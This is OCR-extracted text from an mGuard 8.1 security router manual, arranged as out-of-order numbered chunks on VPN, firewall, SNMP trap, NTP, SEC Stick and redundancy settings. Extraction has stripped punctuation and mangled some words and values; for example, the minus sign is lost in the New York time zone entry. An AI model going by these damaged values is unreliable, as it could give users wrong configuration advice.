351. ord Management menu The mGuard rs4000 rs2000 3G and the mGuard industrial rs devices have connections to which ex ternal buttons or an on off switch and actuators e g a signal lamp can be connected One of the configured VPN connec tions can be established and disconnected via the button or on off switch The VPN connection is specified here The display shows the VPN connections that have been set up under Psec VPN gt gt Connections gt gt Edit gt gt General For the input to be active the service input must be selected under Controlling service input in the IPsec VPN gt gt Connec tions gt gt Edit gt gt General menu The display shows the firewall rule records that have been set up under Network Security gt gt Packet Filter gt gt Rule Records Off VPN connections Rule Records The state of the selected VPN connection or the selected fire wall rule record is indicated via the associated signal contact ACK output Innominate Security Technologies 97 mGuard 8 1 4 7 2 Alarm output Management Service VO Service VO Alarm output General Operation mode Manual setting v Manual setting Closed Operation supervision hd Current state Alarm output closed high OK No alarm Redundant power supply Ignore Link supervision Ignore Temperature condition Ignore Connection state of the internal modem inore Management gt gt Service I O gt gt Alarm output General O
352. orithm has specified by the appended number the more secure it is The relatively new AES 256 method is there fore the most secure however it is still not used that widely The longer the key the more time consuming the encryption procedure However this does not affect the mGuard as it uses a hardware based encryption technique Nevertheless this aspect may be of significance for the partner The algorithm designated as Null does not contain encryp tion Hash Leave this set to All algorithms It then does not matter whether the partner is operating with MD5 SHA 1 SHA 256 SHA 384 or SHA 512 The encryption algorithms SHA 256 and SHA 512 are sup ported by all mGuard devices However not all mGuard de vices accelerate the algorithms via hardware The mGuard centerport supports and does not require hard ware acceleration Only the mGuard smart also accelerates SHA 256 via hardware On the other mGuard devices MD5 and SHA1 are accelerated with hardware Diffie Hellman The Diffie Hellman key exchange method is not available for all the algorithms The bit depth for the encryption can be set here IPsec SA Data Exchange In contrast to SAKMP SA key exchange see above the procedure for data exchange is defined here It does not necessarily have to differ from the procedure defined for key exchange Algorithms See above 280 Innominate Security Technologies 105661_en_02 IPsec VPN menu IPsec VPN gt
353. ormation The mGuard incorporates certain free and open software Some license terms associated with this software require that Innominate Security Technologies AG provides copyright and license information see below for details All the other components of the mGuard Firmware are Copyright 2001 2010 by Innominate Security Technologies AG Last reviewed on 2011 05 11 for the mGuard 7 4 0 release atv BSD style bcron enu GPLv2 bglibs enu GPLv2 bridge utils enu GPLv2 busybox enu GPLv2 MIT derivate license c ares BSD style and GNU GPLv2 dibans Copyright 2001 D J Bernstein conntrack enu GPLv2 curi MTX derivate license ebtables enu GPLv2 EXT2 filesystem utilities GNU GPLv2 lib ext2fs LGPLw2 e2fsprogs lib e2p LGPLv2 lib uuid BSD style ez ipupdate enu GPLv2 fnord enu GPLv2 GNU GPLv2 LGPLv2 md2 Derived from the RSA Data Security Inc MD2 Message Digest Algorithm md5 Derived from the RSA Data Security Inc MDS Message Digest Algorithm libdes BSD style libcrypto BSD style Eric Young BSD style OpenSSL libaes BSD style zlib zlib license raij BSD style Lists the licenses of the external software used on the mGuard The software is usually open source software FreeS WAN Openswan 105661_en_02 Innominate Security Technologies 69 mGuard 8 1 4 3 4 Management gt gt Update With mGuard firmware Version 5 0 0 or later a license must be obtained for the relevant
354. ossible the VPN gateway of the partner is causing problems In this case deactivate and reactivate the connection to reestablish the connection 105661_en_02 SEC Stick menu 11 SEC Stick menu 105661_en_02 The mGuard supports the use of an SEC Stick which is an access protector for IT systems The SEC Stick is a product of the team2work company www team2work de The SEC Stick is a key The user inserts it into the USB port of a computer with an Internet connection and can then set up an encrypted connection to the mGuard in order to securely access defined services in the office or home network The Remote Desktop Protocol for example can be used within the encrypted and secure SEC Stick connection to control a PC remotely in the office or at home as if the user was sitting directly in front of it In order for this to work access to the business PC is protected by the mGuard and the mGuard must be configured for the SEC Stick to permit access because the user of this re mote computer into which the SEC Stick is inserted authenticates herself himself to the mGuard using the data and software stored on her his SEC Stick The SEC Stick establishes an SSH connection to the mGuard Additional channels can be embedded into this connection e g TCP IP connections Innominate Security Technologies 287 m Guard 8 1 11 1 Global SEC Stick Global Access SEC Stick Access Enable SEC Stick service Enable SEC Stick r
355. ote IP 0 0 0 0 Netmask 0 0 0 0 Network gt gt Interfaces gt gt Dial out PPP dial out options This menu item is not included a These settings are only necessary when the mGuard is to establish a data in the scope of functions for link to the WAN Internet via one of these interfaces the mGuard rs2000 3G Via the primary external interface Modem or Built in mobile network mGuard rs2000 Modem network mode Viathe secondary external interface also available in Stealth or Router network mode Phone number to call Phone number of the Internet service provider The connec tion to the Internet is established after establishing the tele phone connection Command syntax together with the previously set ATD modem command for dialing the following dial sequence for example is created for the connected modem ATD76543z2 A compatible pulse dialing procedure that works in all scenar ios is used as standard Special dial characters can be used in the dial sequence 130 Innominate Security Technologies 105661_en_02 Network menu Network gt gt Interfaces gt gt Dial out HAYES special dial characters W instructs the modem to insert a dialing pause at this point until the dial tone can be heard Used when the modem is connected to a private branch exchange An external line must be obtained first for out going calls by dialing a specific number e g 0 before the phone number of the relevant s
356. out a license until further notice Management gt gt Update Local Update Filename To install the packages proceed as follows e Click on Browse select the file and open it so that the file name or path is displayed in the Filename field The file name must have the following format update a b c d e f default lt platform gt tar gz Example update 7 0 0 7 0 1 default ixp4xx_be tar gz e Then click on Install Packages Online Update Package set name To perform an online update proceed as follows e Make sure that there is at least one valid entry under Up date Servers You should have received the necessary details from your licenser e Enter the name of the package set e g update 6 1 x 7 2 0 e Then click on Install Package Set Automatic Update This is a version of the online update where the mGuard independently determines the re quired package set Install the latest patch Patch releases resolve errors in previous versions and have a release x y Z version number which only changes in the third digit position For example 4 0 1 is a patch release for Version 4 0 0 Install the latest minor Minor and major releases supplement the mGuard with new release x Y z forthe properties or contain changes that affect the behavior of the currently installed mGuard Their version number changes in the first or second major version digit position Install the next major For example 4 1 0 is a major or mi
357. owing instructions assume that the certificates have already been correctly installed on the mGuard see Authentication gt gt Certificates on page 190 If the use of revocation lists CRL checking is activated under the Authentication gt gt Cer tificates Certificate settings menu item each certificate signed by a CA that is shown by the HTTPS clients must be checked for revocations 62 Innominate Security Technologies 105661_en_02 Management gt gt Web Settings gt gt Access 105661_en_02 CA certificate Management menu This configuration is only necessary if the user access via HTTPS shows a certificate signed by a CA All CA certificates required by the mGuard to form the chain to the relevant root CA certificate with the certificates shown by the user must be configured If the browser of the remote user also provides CA certificates that contribute to forming the chain then it is not necessary for these CA certificates to be installed on the mGuard and refer enced at this point However the corresponding root CA certificate must be in stalled on the mGuard and made available referenced in any case a When selecting the CA certificates to be used or when changing the selection or the filter settings you must first select and test the Login with X 509 client certificate or password option as the User authentication method before enabling the new setting Only switch to Login restr
358. pecific specific trap mGuardTrapClFSScanFailure 2 additional mGuardTResClFSShare mGuardTResClFSScanError mGuardTResCIFSNumDiffs This trap is sent if the CIFS integrity check has failed Activate traps Yes No enterprise oid mGuardTrapClFSScan generic trap enterpriseSpecific specific trap mGuardTrapClFSScanDetection 3 additional mGuardTResClFSShare mGuardTResClFSScanError mGuardTResCIFSNumDiffs This trap is sent if the CIFS integrity check has detected a de viation Activate traps Yes No enterprise oid mGuardTrapUserFirewall generic trap enterpriseSpecific specific trap mGuardTrapUserFirewallLogin 1 additional mGuardTResUserFirewallUsername mGuardTResUserFirewallSrclP mGuardTResUserFirewallAuthenticationMethod This trap is sent when a user logs into the user firewall Innominate Security Technologies 87 mGuard 8 1 Management gt gt SNMP gt gt Trap VPN traps IPsec connection sta tus changes 88 Innominate Security Technologies enterprise oid mGuardTrapUserFirewall generic trap enterpriseSpecific specific trap mGuardTrapUserFirewallLogout 2 additional mGuardTResUserFirewallUsername mGuardTResUserFirewallSrclP mGuardT ResUserFirewallLogoutRea son This trap is sent when a user logs out of the user firewall enterprise oid mGuardTrapUserFirewall generic trap enterpriseS
359. pecific specific trap mGuardTrapUserFirewallAuthError TRAP TYPE 3 additional mGuardTResUserFirewallUsername mGuardTResUserFirewallSrclP mGuardTResUserFirewallAuthentication Method This trap is sent in the event of an authentication error Activate traps Yes No enterprise oid mGuardTrapVPN genericTrap enterpriseSpecific specific trap mGuardTrapVPNIKEServerStatus 1 additional mGuardTResVPNStatus This trap is sent when the IPsec IKE server is started or stopped enterprise oid mGuardTrapVPN genericTrap enterpriseSpecific specific trap mGuardTrapVPNIPsecConnStatus 2 additional mGuardTResVPNName mGuardTResVPNIndex mGuardTResVPNPeer mGuardTResVPNStatus mGuardTResVPNType mGuardTResVPNLocal mGuardTResVPNRemote This trap is sent when the status of an IPsec connection changes enterprise oid mGuard generic trap enterpriseSpecific specific trap mGuardTrapVPNIPsecConnStatus This trap is sent when a connection is established or aborted It is not sent when the mGuard is about to accept a connection request for this connection 105661_en_02 Management gt gt SNMP gt gt Trap L2TP connection sta tus changes Mobile network traps Incoming text mes sage or voice call and This menu item is only in Sok network supervision cluded in the scope of func tions for the mGuard rs4000 3G mGuard rs2000 3G Ma
360. pecified on the Authen tication tab page see Authentication on page 269 Same firewall settings Same IKE options set Started Disabled Stopped The Disabled setting deletes the VPN connection The other two settings determine the status of the VPN connection when restarting the connection or booting With Version 8 0 or later the VPN connections can be started or stopped via a button on the web interface via text message or the nph vpn cgi script An IP address host name or any for several partners or partners downstream of a NAT router 257 Innominate Security Technologies mGuard 8 1 Address of the remote site s VPN gateway ay Oo Figure 10 2 The address of the transition to the private network where the remote com munication partner is located FN be m VPN gateway of the partner Lill If the mGuard should actively initiate and establish the connection to the remote part ner specify the IP address or host name of the partner here Ifthe VPN gateway of the partner does not have a fixed and known IP address the DynDNS service see glossary can be used to simulate a fixed and known address If the mGuard should be ready to allow a connection to the local mGuard that was ac tively initiated and established by a remote partner with any IP address specify any This setting should also be selected for a VPN star configuration if the mGuard is con
361. peration mode Manual setting Operation supervision Current state Redundant power sup ply Link supervision Temperature condi tion 98 Innominate Security Technologies Operation supervision Manual setting The alarm output can be controlled automatically using Oper ation supervision default or Manual setting Closed Open Alarm The desired state of the alarm output for function control can be selected here Displays the state of the alarm output Only available with the mGuard rs4000 or mGuard rs4000 3G If set to Ignore the state of the power supply does not influ ence the alarm output If set to Supervise the alarm output is opened if one of the two supply voltages fails Ignore Supervise Monitoring of the link status of the Ethernet connections If set to Ignore the link status of the Ethernet connections does not influence the alarm output If set to Supervise the alarm output is opened if one link does not indicate connectivity Set the links to be monitored under Link supervision in the Network gt gt Ethernet gt gt MAU set tings menu The alarm output indicates overtemperature and undertem perature The permissible range is set under System Temper ature C inthe Management gt gt System Settings gt gt Host menu If set to Ignore the temperature does not influence the signal contact If set to Supervise the alarm output is opened if the temper ature is not w
362. plies to the outgoing data packets the firewall rules for Outgoing for this other connection definition are used 276 Innominate Security Technologies 105661_en_02 IPsec VPN menu If the mGuard has been configured to forward SSH connection packets e g by permit ting a SEC Stick hub amp spoke connection existing VPN firewall rules are not applied This means for example that packets of an SSH connection are sent via a VPN tunnel despite the fact that this is prohibited by its firewall rules IPsec VPN gt gt Connections gt gt Edit gt gt Firewall Incoming General firewall set Allow all incoming connections the data packets of all in ting coming connections are allowed Drop all incoming connections the data packets of all in coming connections are discarded Accept Ping only the data packets of all incoming connec tions are discarded except for ping packets ICMP Use the firewall ruleset below displays further setting op tions This menu item is not included in the scope of functions for the mGuard rs2000 3G mGuard rs2000 The following settings are only visible if Use the firewall ruleset below is set Protocol All means TCP UDP ICMP GRE and other IP protocols From IP To IP 0 0 0 0 0 means all IP addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Rout ing on page 24 Incoming From IP the IP address in the VPN tunnel TolP th
363. r the number of incoming and outgoing ARP requests or replies allowed per second These values are set to a level that can never be reached dur ing normal practical operation However they can be easily reached in the event of attacks thus providing additional pro tection If there are special requirements in your operating environ ment these values can be increased 105661_en_02 Network Security menu 8 3 Network Security gt gt User Firewall a This menu is not available on the mGuard rs2000 3G The user firewall is used exclusively by firewall users i e users that are registered as fire wall users see Authentication gt gt Firewall Users on page 185 Each firewall user can be assigned a set of firewall rules also referred to as a template 8 3 1 User Firewall Templates Network Security User Firewall User Firewall Templates p Yes v BluePrint Eat All defined user firewall templates are listed here A template can consist of several firewall rules A template can be assigned to several users Defining a new template e Inthe template table click on Edit to the right of the unnamed entry under Name e If the unnamed entry cannot be seen open another row in the table Editing a set of rules e Click on Edit to the right of the relevant entry Network Security gt gt User Firewall gt gt User Firewall Templates 105661 _en_02 Enabled Activates deactiva
364. rative Users menu see Page 181 The option of RADIUS authentication is also available see Page 187 partner Depending on which user ID is used to log in user or adminis trator password the user has the right to operate and or con figure the mGuard accordingly Login with X 509 client certificate or password User authentication is by means of login with a password see above or The users browser authenticates itself using an X 509 certificate and a corresponding private key Additional de tails must be specified below The use of either method depends on the web browser of the remote user The second option is used when the web browser provides the mGuard with a certificate Login restricted to X 509 client certificate The user s browser must use an X 509 certificate and the cor responding private key to authenticate itself Additional details must be specified here Before enabling the Login restricted to X 509 client certificate option you must first select and test the Login with X 509 client certificate or password op tion Only switch to Login restricted to X 509 client cer tificate when you are sure that this setting works Otherwise your access could be blocked Always take this precautionary measure when modifying settings under User authentication 105661_en_02 Innominate Security Technologies 61 mGuard 8 1 X 509 authentication for HTTPS If the following User authentication meth
365. rd Each cell contains multiple control elements which can be addressed via their IP addresses Different address areas are used for each cell A service technician should be able to use her his notebook on site to connect to the local network for machine A B or C and to communicate with the individual controllers So that the technician does not have to know and enter the IP address for every single controller in machine A B or C host names are assigned to the IP addresses of the controllers in accor dance with a standardized diagram that the service technician uses The host names used for machines A B and C are identical i e the controller for the packing machine in all three machines has the host name pack for example However each machine is assigned an individual domain name e g cell a example com The service technician can con nect her his notebook to the local network at machine A B or C and use the same hostnames _ S3 in each of these networks to Notebook of service technician IP addresses and host names with domain communicate with the corre ontroller A 10 1 30 1 24 sponding machine controllers fold cell a example com The notebook can obtain the IP 10 1 30 2 24 address to be used the name server and the domain from the m Guard via DHCP ontroller B ontroller C 10 1 30 3 24 s pack cell a example com Switch 10 1 30 0 24 a i ontroller A ontroller B ontroller C fill cell a example
366. rding to X 509 The selection list contains the machine certificates that have been loaded on the mGuard under the Authentica tion gt gt Certificates menu item see Page 190 SSH server certificate Specifies how the mGuard authenticates the SSH client 2 The following definition relates to how the mGuard verifies the authenticity of the SSH client The table below shows which certificates must be provided for the mGuard to authenticate the SSH client if the SSH client shows one of the following certificate types when a connection is established A certificate signed by a CA A self signed certificate For additional information about the table see Authenti cation gt gt Certificates Authentication for SSH The partner shows the fol Certificate specific to individ Certificate specific to indi lowing ual signed by CA vidual self signed The mGuard authenti cates the partner using afi All CA certificates that form Remote certificate the chain to the root CA certif icate together with the certifi cate shown by the partner PLUS if required Remote certificates if used as a filter According to this table the certificates that must be provided are the ones the mGuard uses to authenticate the relevant SSH client 48 Innominate Security Technologies 105661_en_02 Management menu The following instructions assume that the certificates have already been correctly installed on the mGuard
367. re then routed to the corresponding network via the secondary external interface in permanent or temporary mode Gateway Specify the IP address if known of the gateway that is used for routing to the external network described above When you dial into the Internet using the phone number of the Internet service provider the address of the gateway is usually not known until you have dialed in In this case enter gate way in the field as a wildcard 105661_en_02 Network menu Operation Mode permanent temporary In both permanent and temporary operating mode the modem must be available to the mGuard for the secondary external interface so that the mGuard can establish a connection to the WAN Internet via the telephone network connected to the modem Which data packets are routed via the primary external interface Ethernet interface and which data packets are routed via the secondary external interface is determined by the routing settings that are applied for these two external interfaces Therefore an interface can only take a data packet if the routing setting for that interface matches the destination of the data packet The following rules apply for routing entries If multiple routing entries for the destination of a data packet match then the smallest net work defined in the routing entries that matches the data packet destination determines which route this packet takes Example The external route of t
368. reached You should also set the system time if the menu item Update System time is set to Yes under the positioning system under Network gt gt Mobile Network gt gt Positioning system The date and time are specified in the format YYYY MM DD HH MM SS YYYY Year MM Month DD Day HH Hour MM Minute SS Second lf a current local time that differs from Greenwich Mean Time is to be displayed under Current system time you must enter the number of hours that your local time is ahead of or behind Greenwich Mean Time Example in Berlin the time is one hour ahead of GMT There fore enter CET 1 In New York the time is five hours behind Greenwich Mean Time Therefore enter CET 5 The only important thing is the 1 2 or 1 etc value as only these values are evaluated not the preceding letters They can be CET or any other designation such as UTC If you wish to display Central European Time e g for Ger many and have it automatically switch to from daylight saving time enter CET 1CEST M3 5 0 M10 5 0 3 If this option is set to Yes the mGuard writes the current sys tem time to its memory every two hours If the mGuard is switched off and then on again a time from this two hour time slot is displayed not a time on January 1 2000 NTP Network Time Protocol The mGuard can act as the NTP server for computers that are connected to its LAN port In this case the compute
369. rent scan The menu in the web interface has been extended so that you can now see that status of each scan The progress indicator shows the number of checked files 3 2 2 VPN extensions The setting for the VPN connection is now divided into Disabled Started and Stopped The Disabled setting ignores the VPN connection as if this were not configured This also means it cannot be dynamically enabled disabled The other two settings determine the sta tus of the VPN connection when it is restarted or booted In Version 8 0 the VPN connections can be started or stopped via a button on the web in terface via text message an external switch or the script noh vpn cgi This takes into ac count all VPN connections Packets that correspond to a VPN connection that is not dis abled are forwarded when the connection is established or dropped if the connection is not established VPN connections which were set to Active No in the previous versions are now interpreted as Disabled In Version 8 0 the names of VPN connections are made unique During the update a hash or unique number is added to names that are duplicated You can set a timeout which aborts the VPN connection if it has been started via text mes sage nph vpn cgi or the web interface VPN connections which have been started by an ex plicit request via an application are not affected VPN tunnels which only differ in their source network can now
370. replaced it must first be configured with the old password before it is connected How to proceed in the event of an incorrect password If you have inadvertently entered an incorrect password on an mGuard pro ceed as follows If you can still remember the old password proceed as follows e Reconfigure the mGuard on which the incorrect password was entered so that it uses the old password e Wait until the mGuard indicates that the old password is being used e Then enter the correct password If you have forgotten the old password proceed as follows e Check whether you can read the old password out from the other mGuard e Ifthe other mGuard is disabled or missing you can simply enter the correct new pass word on the active mGuard on which you inadvertently set the incorrect password Make sure that the other mGuard is assigned the same password before operating it again e If the other mGuard is already using the new password you must make sure that the mGuard with the incorrect password is not active or able to be activated e g by re moving the cable at the LAN or WAN interface In the case of remote access you can enter a destination for the connectivity check that will not respond Prior to provoking this kind of error check that there is no redun dancy error on any of the mGuard devices One mGuard must be active and the other must be on standby It might be necessary to rectify any errors displayed and o
371. rewall Redundancy gt gt Redundancy How to proceed in the event of an incorrect password If you have inadvertently entered an incorrect password on an mGuard you cannot simply reenter the password using the correct one Otherwise in the event of adverse circumstances this may result in both mGuard devices being active Case 1 only one mGuard has an incorrect password The process of changing the pass word has not yet begun on the other mGuard e Reconfigure the mGuard on which the incorrect password was entered so that it uses the old password e Wait until the mGuard indicates that the old password is being used e Then enter the correct password Case 2 the other mGuard is already using the new password e The status of both mGuard devices must be such that they are using an old password but expecting a new one red cross To ensure that this is the case enter random passwords successively e Finally generate a secure password and enter it on both mGuard devices This pass word is used immediately without any coordination During this process the state of the mGuard on standby may briefly switch to outdated However this situation resolves itself automatically Encryption Algorithm DES 3DES AES 128 AES 192 AES 256 See Algorithms on page 280 Hash Algorithm MD5 SH1 SHA 256 SHA 512 See Algorithms on page 280 Interface for state synchro Interface which is Internal Interface Dedicated Inter
372. ries An attacker can also falsify RADIUS responses and gain access to the mGuard if they know the user names These user names are transmitted as plain text with the RA DIUS request The attacker can thus simulate RA DIUS queries and thereby find out user names and the corresponding passwords Administrative access to the mGuard should remain possible while the RADIUS server password is being changed Pro ceed as follows to ensure this e Setup the RADIUS server for the mGuard a second time with a new password e Also set this new password on the RADIUS server e Onthe mGuard delete the line containing the old pass word Innominate Security Technologies 189 mGuard 8 1 Certificate Self signed certificates Certificate machine certif icate 7 4 Authentication gt gt Certificates Authentication is a fundamental element of secure communication The X 509 authentica tion method relies on certificates to ensure that the correct partners communicate with each other and that no incorrect partner is involved in communication An incorrect com munication partner is one who falsely identifies themselves as someone they are not see glossary under X 509 certificate on page 363 A certificate is used as proof of the identity of the certificate owner The relevant authorizing body in this case is the CA certification authority The digital signature on the certificate is provided by the CA By prov
373. ries to be transmitted to the external log server specified below select Yes Log Server IP address Specify the IP address of the log server to which the log entries should be transmitted via UDP An IP address must be specified not a host name This func tion does not support name resolution because it might not be possible to make log entries if a DNS server failed Log Server port Specify the port of the log server to which the log entries should be transmitted via UDP Default 514 Innominate Security Technologies 321 mGuard 8 1 Logging gt gt Settings channel the IP address of the SysLog server must be located in the network that is specified as the Remote network in the definition of the VPN connec tion a If SysLog messages should be transmitted to a SysLog server via a VPN The internal IP address must be located in the network that is specified as Local in the definition of the VPN connection see IPsec VPN gt gt Connec tions gt gt Edit gt gt General Ifthe IPsec VPN gt gt Connections gt gt Edit gt gt General Local option is set to 1 1 NAT see Page 263 the following applies The internal IP address must be located in the specified local network Ifthe IPsec VPN gt gt Connections gt gt Edit gt gt General Remote option is set to 1 1 NAT see Page 265 the following applies The IP address of the SysLog server must be located in the network that is specified as Remote i
374. rk gt gt General 105661_en_02 Probe targets Probe Interval Number of times all probes need to fail before the mobile net work connection is considered stalled Network menu Here you can enter the probe targets as host names or IP ad dresses The ping type can be configured separately for each probe tar get ICMP Ping ICMP echo request ICMP echo reply DNS Ping DNS query to UDP port 53 IKE Ping IPSec IKE query to UDP port 500 Ping types IKE Ping Determines whether a VPN gateway can be reached at the IP address specified ICMP Ping Determines whether a device can be reached at the IP ad dress specified This is the most common ping test However the re sponse to this ping test is disabled on some devices This means that they do not respond even though they can be reached DNS Ping Determines whether an operational DNS server can be reached at the IP address specified A generic request is sent to the DNS server with the spec ified IP address and every DNS server that can be reached responds to this request The probe targets are processed in the specified order Indicates the time between two tests in minutes Value 2 60 default 5 Number of repeats before the mobile network connection is considered to be aborted Value 1 5 default 3 Innominate Security Technologies 173 mGuard 8 1 6 7 2 SIM Settings The mGuard rs4000 rs2000 3G can be equippe
375. rk connection Port On Switches the Ethernet connection on or off The Port On function is not supported by mGuard centerport The Port On function is supported with restrictions on mGuard delta the internal side switch ports cannot be switched off mGuard pci in driver mode the internal network interface cannot be switched off however this is possible in power over PCI mode Port Mirroring The port mirroring function enables any packets to be for warded to a specific recipient You can select the receiver port or the mirroring of the incoming and outgoing packets from each switch port Link supervision Only visible when the Link supervision menu item under Management gt gt Service I O gt gt Alarm output is set to Super vise If link Supervision is active the alarm output is opened if one link does not indicate connectivity Address Resolution Table Port Name of the Ethernet connection to which the row refers Only for devices with an inter MACs Lists the MAC addresses of the connected Ethernet capable nal switch devices The switch can learn MAC addresses which belong to the ports of its connected Ethernet capable devices The contents of the list can be deleted by clicking the button Port Statistics A statistic is displayed for each physically accessible port of the integrated Managed l Switch The counter can be reset via the web interface or the following command Only for devices with an inter
376. rk swapped round must also be implemented for VPN partners see Remote on page 265 a Yes is not supported in Stea th network mode No default VPN connections exist separately Yes hub and spoke feature enabled a control center diverts VPN connections to several branches that can also communi cate with each other With a star VPN connection topology mGuard partners can also exchange data with one another In this case it is recom mended that the local mGuard consults CA certificates for the authentication of partners see Authentication on page 269 In the event of hub and spoke 1 1 NAT of the partner is not supported No only when started via nph vpn cgi or CMD input If errors occur when establishing VPN connections the mGuard logging function can be used to find the source of the error based on corresponding entries see Logging gt gt Browse local logs menu item This option for error diagnostics is used as Standard Set this option to No default if it is sufficient Option Only when started via nph vpn cgi or CMD input If the option of diagnosing VPN connection problems using the mGuard logging function is too impractical or insufficient select this option This may be the case if the following conditions apply 248 Innominate Security Technologies 105661_en_02 IPsec VPN menu IPsec VPN gt gt Global gt gt Options 105661_en_02 Incertain application env
377. rlCfgBackup 1 additional mGuardTrapBladeRackID mGuardTrapBladeSlotNr mGuardTrapBladeCtrlCfgBackup This trap is sent when configuration backup is triggered for the mGuard blade controller 105661_en_02 Management gt gt SNMP gt gt Trap CIFS integrity traps Successful integrity This menu item is not included check of a CIFS share in the scope of functions for the mGuard rs2000 3G mGuard rs2000 Failed integrity check of a CIFS share Found a suspicious difference on a CIFS share Userfirewall traps Userfirewall traps This menu item is not included in the scope of functions for the mGuard rs2000 3G m Guard rs2000 105661_en_02 Management menu mGuardTrapBladeCtrlCfg enterpriseSpecific mGuardTrapBladeCtrlCfgRestored 2 mGuardTrapBladeRackID mGuardTrapBladeSlotNr mGuardTrapBladeCtrlCfgRestored enterprise oid generic trap specific trap additional This trap is sent when configuration restoration is triggered from the mGuard blade controller Activate traps Yes No enterprise oid mGuardTrapClFSScan generic trap enterpriseSpecific specific trap mGuardTrapClFSScaniInfo 1 additional mGuardTResClFSShare mGuardTResClFSScanError mGuardTResCIFSNumDiffs This trap is sent if the CIFS integrity check has been success fully completed Activate traps Yes No enterprise oid mGuardTrapClIFSScan generic trap enterpriseS
378. rom To Port Action Comment Log Log entries for unknown connection attempts All means TCP UDP ICMP GRE and other IP protocols 0 0 0 0 0 means all IP addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Rout ing on page 24 Only evaluated for TCP and UDP protocols any refers to any port startport endport e g 110 120 refers to a port area Individual ports can be specified using the port number or the corresponding service name e g 110 for pop3 or pops for 110 Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Freely selectable comment for this rule For each individual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default settings Yes No When set to Yes all connection attempts that are not covered by the rules defined above are logged Firewall rules for outgoing PPP connections from the LAN interface The parameters correspond to those under Incoming Rules PPP These outgoing rules apply to data packets that are sent out via a data link initiated by PPP dial in 138 Innominate Security Technolog
379. rom the computer and the corre sponding responses are forwarded due to the nature of Stealth mode DHCP Servers to relay A list of one or more DHCP servers to which DHCP requests to should be forwarded Append Relay Agent When forwarding additional information for the DHCP servers Information to which information is being forwarded can be appended ac Option 82 cording to RFC 3046 166 Innominate Security Technologies 105661_en_02 Network menu 6 6 Network gt gt Proxy Settings 6 6 1 HTTP S Proxy Settings Network Proxy Settings HTTP S Proxy Settings HTTP S Proxy Settings Use Proxy for HTTP and HTTPS itis also used for vPNintcp Y encapsulation HTTP S Proxy Server proxy example com Port 3128 Proxy Authentication Login Password A proxy server can be specified here for the following activities performed by the mGuard itself CRL download Firmware update Regular configuration profile retrieval from a central location Restoring of licenses Network gt gt Proxy Settings gt gt HTTP S Proxy Settings HTTP S Proxy Settings Use Proxy for HTTP When set to Yes connections that use the HTTP or HTTPS and HTTPS protocol are transmitted via a proxy server whose address and port should be specified in the next two fields HTTP S Proxy Server Host name or IP address of the proxy server Port Number of the port to be used e g 3128 Proxy Authentication Login User name
380. rotected with a PIN The PIN is saved in the mGuard The PIN is not displayed in the web browser However it is possible to overwrite or delete it A PIN is used in the following cases When the mGuard is restarted When the SIM card is replaced When the PIN is changed When the SIM card is activated For login to a mobile network provider Roaming enables or prevents dialing into foreign mobile net works Dialing into another network can incur additional costs When roaming is disabled you can select a fixed provider You can restrict the SIM card registration to a provider from the list This selection is only active when roaming is disabled Innominate Security Technologies 175 mGuard 8 1 Network gt gt Mobile Network gt gt SIM Settings Access Point Name APN of the provider PPP authentication PPP login name PPP password Secondary SIM slot 176 Maximum runtime of the fallback SIM until switching back to the primary SIM Innominate Security Technologies Enter the name of the access gateway for the packet transmis sion of your mobile network provider The APN can be ob tained from your mobile network provider This is required by some providers for the transmission of packet data The access data must be entered for this Enter the PAP or CHAP user names to log on to the access gateway of the mobile network provider This information can be obtained from your mobile
381. rs should be configured so that the local address of the mGuard is specified as the NTP server address If the mGuard is operated in Stealth mode the management IP address of the mGuard if this is configured must be used for the computers or the IP address 1 1 1 1 must be en tered as the local address of the mGuard For the mGuard to act as the NTP server it must obtain the current date and the current time from an NTP server time server To do this the address of at least one NTP server must be specified This feature must also be activated 38 Innominate Security Technologies 105661_en_02 Management menu Management gt gt System Settings gt gt Time and Date Enable NTP time Once the NTP is activated the mGuard obtains the date and synchronization time from one or more time server s and synchronizes itself with it or them Initial time synchronization can take up to 15 minutes During this time the mGuard continuously compares the time data of the external time server and that of its own time so that this can be adjusted as accurately as possible Only then the mGuard can act as the NTP server for the computers connected to its LAN interface and provide them with the system time An initial time synchronization with the external time server is performed after every booting process unless the mGuard has a built in clock for mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard pci SD mGuard delta and for
382. rtner which is set as the local VPN identifier on the client VPN gateways use the VPN Identifier to detect which configurations belong to the same VPN connection The following entries are valid for PSK Empty IP address used by default An IP address Ahost name with prefix e g vpn1138 example com An e mail address e g piepiorra example com Innominate Security Technologies 275 m Guard 8 1 10 2 4 Firewall IPsec VPN Connections Mannheim Leipzig General Authentication Firewall IKE Options Incoming General firewall setting Use the firewall ruleset below Log Dc tas in Y 262e7ace 2E 1e 20 Dx a a A a i ial 00000 0 0 0 0 0 any Accept w defaultrule please adap No Log entries for unknown connection attempts Lic Outgoing General firewall setting Use the firewallrulesetbelow Log ID wpro A erar AL 1 40e Se7 HOODEO PE Protccot Frome trompon tor topon action comment tog F 1 Al w 0 0 0 0 0 any 0 0 0 0 0 any Accept default rule please adap No Log entries for unknown i No Y connection attempts Incoming outgoing firewall While the settings made under the Network Security menu item only relate to non VPN con nections see above under Network Security menu on page 205 the settings here only relate to the VPN connection defined on these tab pages If multiple VPN connections have been defined you
383. rver of the mGuard In Router mode with NAT or port forwarding the port numbers for the CIFS server have priority over the rules for port forwarding Port forwarding is set under Network gt gt NAT Access to the CIFS server is approved internally via incoming calls dial in and VPN as standard and can be restricted or expanded via the firewall rules A different default setting can also be defined using these rules From IP Enter the address of the computer network from which remote access is permitted or forbidden in this field IP address 0 0 0 0 0 means all addresses To specify an ad dress area use CIDR format see CIDR Classless Inter Do main Routing on page 24 Innominate Security Technologies 243 mGuard 8 1 CIFS Integrity Monitoring gt gt CIFS AV Scan Connector Interface Action Comment Log Consolidated Imported Enabled Shares CIFS Share Exported in Subdirec tory 1 244 Innominate Security Technologies External Internal External 2 VPN Dial in DMZ Specifies to which interface the rule should apply If no rules are set or if no rule applies the following default set tings apply Remote access is permitted via nternal VPN and Dial in Access via External External 2 and DMZ is refused Specify the access options according to your requirements If you want to refuse access via Internal VPN or Dial in you must implement this explicitly by
